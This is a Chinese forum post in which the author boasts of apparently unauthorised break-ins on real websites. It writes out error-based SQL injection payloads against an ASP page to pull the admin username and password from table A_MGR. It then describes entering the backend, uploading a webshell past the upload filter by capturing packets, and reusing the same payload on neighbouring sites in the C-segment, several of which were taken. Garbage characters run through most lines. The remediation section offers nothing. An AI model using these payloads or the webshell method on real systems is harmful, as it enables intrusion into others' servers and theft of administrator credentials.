发现一个注入点
5 U- y7 o# m/ B! h# Thttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
( K# c; H) Q4 @' n. e0 Q% X U5 D7 N
习惯性的加’having1=1--
; c1 n$ E5 F( M5 a% i5 \& o8 W- G5 b; Y9 c3 g8 R
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
. o. e( z, D% E8 k4 i q; W/ G& a+ V. L" j/ U* L0 q4 q( M1 U" s
0
# {. F- h7 t7 |: y% F
2 ?' |6 [ ?* |" ~+ e爆出Diary_A.dl_Title(这时候很激动啊)
1 S4 y* ^. x( ?& C
/ x) j7 _ |8 |7 |" c+ k那么继续
$ S: p' C+ g! p( o4 ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—3 M1 X- U P9 f9 F
, k+ L! ]* s( W0 g
继续,一直爆下去( Z. W! D2 j1 {; Y, P
# \+ Q6 x' ^7 O6 y8 Z: p
爆到几个字段和表段 但是没找到需要的管理用户的字段
; T& D a7 m; F
& e {" N+ m$ n蛋疼了 怎么办 然后去后台登陆页看源码
2 Y U; |; [. K$ `9 n' v
6 M: @2 p6 ?4 F6 m5 `* A3 N; w( u0 b% P# ^% `! {' r' E) Y. K& z- n
+ d0 m% G5 v% L% nInput name= “ADUID”
1 u' p, [3 q6 G, K$ pInput name= “ADPWD”
- x; _: e, X& n3 j+ p' g
$ U) C- Y m' e5 W9 ~. o1 E) C# m很幸运 找到了字段那就继续- g) d2 Z- U! I% n$ V! F9 Y
找到之后开始爆用户( n G- ^) {/ t' `6 `, e
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
- _* `9 Y) c' ]4 o爆密码
5 \# ]6 [. b/ J& _0 ?% Y1 Dhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
+ K2 i; o0 @/ ?1 I2 d8 Y2 U" V* s5 z$ e测试了下 这个注入点只能爆到文章哪里的表
3 `4 o# V3 f! C5 I6 r: v: f- B# _% c6 D/ E
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了. R4 t8 [: g! |$ S. O X
' v, u' u( h4 c又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了 g; H9 B; d. K! j
1 L* l0 y$ B+ ^! \. B' g
473
( F( b4 z% ^( Q- L2 E
& \9 W5 _; p6 r& h: A6 X1 O进后台
& R `/ K5 g9 ]7 q: X: M: E" V% a. M/ z2 |1 G
* Z: A- [8 B: M8 E- j8 W' S" p发现几个上传点 有的地方不能上传 而且防止恶意代码0 {* B* q+ D* B3 _# s
3 B8 ]4 d+ s t! ?! ~' X1 o, m没办法 各种百度各种找大牛 找到一只好像可以突破的马! g, P+ V: j. G6 n
. z7 D4 z, U* C" Z* i$ V
- Q) g8 K# |: l在系统管理那里直接上传 不过没有显示地址
4 z8 e5 s+ X: d* [0 x V5 ^* o- }! c; u; E7 _2 j1 |" K
再上传一次 抓包 搞定OK
5 p: U3 t3 v" p0 d& W/ O) [. _
. z3 |2 X# ]# o9 t) i. h" f4 |$ r! g5 y) Q6 D, I" R5 Y4 l1 v% v8 B! F$ h$ a
& p( R; r7 n; d/ x
472) F) ~. g4 f* k% K2 j; S
5 }. f" m" s4 i W
晚上不行了 去睡觉。。。; p4 E9 h$ u9 a; F9 \
第二天刚起床 闲的没事做继续日站吧
1 a% l; C. _1 X2 b% d/ i, H) J: K6 f
找个站 就把这个站的旁c扫了下2 u! d4 K2 t9 r! {# H8 J: f
& A, a2 m/ A3 Z: q3 ]) {; {发现c段也有一个购物站 ,然后还和这个站的模板差不多
' n5 E# J# P0 _2 d W8 {) U3 U! P1 d3 u$ b( z7 q0 N. [) e4 M
就找到会员登录口测试
) w' i6 ^. X" L1 I7 M% E' [$ Q/ C5 ]- S8 `
'and (select top 1 MGR_UID from A_MGR)>0—
& b' M+ j2 N, l' D! i果断爆到了 这时候我很激动 通杀
+ \8 S, [& P& x$ a- s' b4 t) t, g. ~+ ?6 \ D& r
再次翻c段
4 B0 P1 m0 ]* G, [6 X- w R R" Q
翻出几个站 都成功拿下' A4 @8 R& e% Z7 @4 {
) I# j% P; F$ E9 @, H' `& L1 L6 o' a% C' s
: g" W! H7 b2 v) f% }
修复方案: t# h6 k! l0 i7 v& g( G
他们比我专业
: s+ i8 H; d2 V: Y
- U p# [$ V: p% n- r/ f) q
5 _4 b# {, a6 P/ d: G2 ]+ @: \ p# R
. [. [% [ w' B; a |
发表于 2013-4-4 17:40:38
收藏
支持
反对